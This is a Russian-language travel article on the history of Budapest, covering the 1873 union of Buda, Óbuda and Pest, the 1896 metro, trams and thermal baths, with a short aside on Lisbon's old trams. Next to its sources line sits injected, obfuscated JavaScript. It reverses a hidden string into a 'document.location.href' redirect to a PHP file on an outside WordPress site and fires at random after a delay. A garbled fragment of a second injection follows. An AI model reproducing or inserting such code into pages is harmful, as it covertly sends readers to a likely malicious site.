Красотка с “прошлым”

Знаете ли вы, что столица Венгрии моложе, чем ее улицы? В своем современном виде Будапешт появился 17 ноября 1873, когда произошло объединение Буды (Buda венг.) и Обуды (Óbuda венг.), расположенных на западном берегу Дуная, с Пештом (Pest венг.) — на восточном берегу.

В I веке до нашей эры на месте Будапешта существовало крупное поселение кельтов Ак-Инк. Позже зашли римляне (89 год н.э.) и постепенно поселение превратилось в римский город Аквинкум (106 год), который стал центром и столицей провинции Паннония.

Где-то в 895 году на Дунай пришли первые венгерские племена, Аквинкум был переименован в Буду (позднее Обуду – Старую Буду) и стал первым политическим центром Венгрии. Поселение, которое создали венгерские племена, было разграблено и разрушено монголами между 1241 и 1242 годами.

Пешт как самостоятельный город упоминается впервые в 1148 году. В древности на месте Пешта были кельтские и римские поселения. Стал важным экономическим центром в XI—XIII столетиях.

С 1247 года король Бела IV на горе начал возведение укрепленного королевского замка Буда, который стал городом как для правящей власти, так и для горожан. В 1361 Буда была провозглашена столицей Венгерского королевства.

Позже Буда и соседний город Пешт были оккупированы Турками, пережили упадок, были освобождены австрийскими войсками. С 18-го века началось бурное развитие Пешта как торгового центра. Со временем население Пешта выросло, Пешт развивался более стремительно, чем Буда и Обуда. Вплоть до 1873 года, когда три города объединились.

Издавна существовали споры между живущими на разных берегах Дуная венгерцами. Сегодня эти споры приобрели шуточную форму. Жители Буды утверждают что жителям Пешта повезло больше чем им, ведь те могут наблюдать со своего берега всю красоту их города. А жители Пешта аналогично завидуют жителя Буды, которые каждый день через реку видят прелести правого берега.

Интересно, что уже через 23 года после образования нового города в нем появился метрополитен. Это первый метрополитен в континентальной Европе. Иными словами, в Евразии будапештский метрополитен уступает в возрасте лишь лондонской подземке. Первая ветка «подземного трамвая» (именно так он назывался при постройке) была построена под проспектом Андриаши к празднованию тысячелетия Венгрии в 1896 году и соединила центр города со свежесозданной Площадью Героев.

Отличительной чертой этой ветки являются крайне маленькие расстояния между станциями и удивительно низкое залегание вглубь. Станции расположены практически сразу под асфальтом. Будапештские власти поддерживают «древний колорит» этой ветки соответствующим оформлением станций и стилизованными под старину составами. Так что подивиться метрополитеном более чем вековой давности легко можно преодолев всего один лестничный пролет.

Трамваями Будапешт, кстати, тоже отличаются. Трамвайные маршруты венгерской столицы – самые загруженные в мире. В «час пик» вагоны прибывают на остановки с интервалом в 60-90 секунд. Будапештские линии – длиннейшие в мире. По городу курсирует 40 низковольтных составов, каждый из которых имеет джину почти в 54 метра.

Будапешт – единственная европейская столица, имеющая официальный статус курорта. А все благодаря огромному количеству минеральных источников, протекающих под землей (которые, кстати обнаружили еще древние римляне). Большая часть купален имеет вид открытых бассейнов с теплой водой, а также саун. Насыщенные магнием и серой воды помогают справиться с сердечно-сосудистыми, ревматическими и гинекологическими заболеваниями.

Источники: Википедия$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov-o-budapeshte-i-vengrii” target=”_blank” rel=”noopener”>timetraveling.ru

А знаете ли вы, что по старому городу в Лиссабоне бегают старинные, начала XX века, трамвайчики Brill? Это самая крупная «старинная» трамвайная система в мире, причем это не экскурсионный маршрут, а самый настоящий городской транспорт, со стоимостью всего 1 евро.

ЕвропаСлайдерСтрановедение